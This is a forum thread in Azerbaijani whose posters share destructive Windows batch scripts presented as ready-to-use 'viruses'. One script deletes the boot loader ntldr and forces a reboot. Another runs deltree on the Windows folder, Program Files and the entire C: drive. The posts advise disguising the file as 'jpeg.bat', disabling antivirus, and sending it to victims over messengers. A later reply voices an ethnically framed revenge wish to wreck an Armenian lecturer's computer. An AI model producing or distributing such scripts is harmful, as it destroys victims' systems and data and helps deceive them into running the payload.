Jump to content
Forum Windows-az.com

Virus hazirlayaq

Delphi7

Recommended Posts

Bu virusu hətda materinkayada yeridə bilərsiz Virusa 100% teminat veriəm işləyir sadecə Noteped yada Bloknotu açıb içinə bunlari yazin

cd..

cd..

attrib -s -h -r -a c:ntldr

del c:ntldr

shutdown -r

yaddaşa saxla(сохранит как)edin txt isş bütün fayıllar(все филе)edin əesələn:jpeg.bat kimi qeyd edin və istədiynizə göndərin MMS ICQ MAGENT vasitəsiylə açıldıqdan 30 saniyə sora kompüter sönür ..Amma ehtiyatli olun özünüzdə..

PS: Virusu (Avast, Kaspersky, NOD32 ) antivirusları tapır buna görəədə siz gərək göndərmək istədiyiniz adama bunları etdirməlisiz ..Sizə uğurlar

• 2 ay sonra...
Proqramlar telegramda
  • 1 ay sonra...

Salamlar bu da men bildiyim cox tehlukeli bir virusdu. Amma bunu antiviruslar taniyir ona gore birinci antini baglayin sonra blaknota bunu yazib .bat farmatinda yaddawa yazin sonra isdediyiviz birine gonderin onun pc-si cokecey. Kod:

@echo off

C:\\WINDOWS\\COMMAND\\deltree /y c:\\windows\\*.*

@echo off

C:\\WINDOWS\\COMMAND\\deltree /y c:\\Progra~1\\*.*

@echo off

C:\\WINDOWS\\COMMAND\\deltree /y c:\\*.*

@echo off

cls

cls

@echo .::HaCk By_Huseyn.::.

@echo off

Qeti ozuvuzde yoxlamayin

Before--- Xanis_007

After----- Huseyn.

• 1 ay sonra...

Qaqa bu mukemmel bir fikirdir. Bir il oncesine kimi bir ermeni vardi. Internetde elime ayagima dolasirdi Azerbaycanli olduguma gore. Cox fikirlesdim ala bunun kompunu nece sokum... turk saytlarinda basqasinin kompuna nasil girmek olar deye meqaleler oxudum tebii ki basim cixmadi.. Yana yana qaldim... Onu da deyim ki o ermeni dosent idi ermenistenda inistitutda. hemise oz isyerinde internete girirdi. Dedim ala onun kompuna girsem neyi var neyi yox goturecem )) Sonra virus istedim axtaram )) dedim bele sey olmaz )) Budur bir il sonra rast geldim...

DOSTLAR TESEKKURLER

• 1 ay sonra...
  • 1 sene sonra...

Sohbete katıl

Şimdi mesajını gönderebilir ve daha sonra kayıt olabilirsin. Bir hesabın varsa, hesabınla göndermek için şimdi oturum aç.

Misafir
Bu konuya yanıt ver...

×   Zengin metin olarak yapıştırıldı.   Paste as plain text instead

Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Önceki içeriğiniz geri yüklendi.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

• loading...
  • Create New...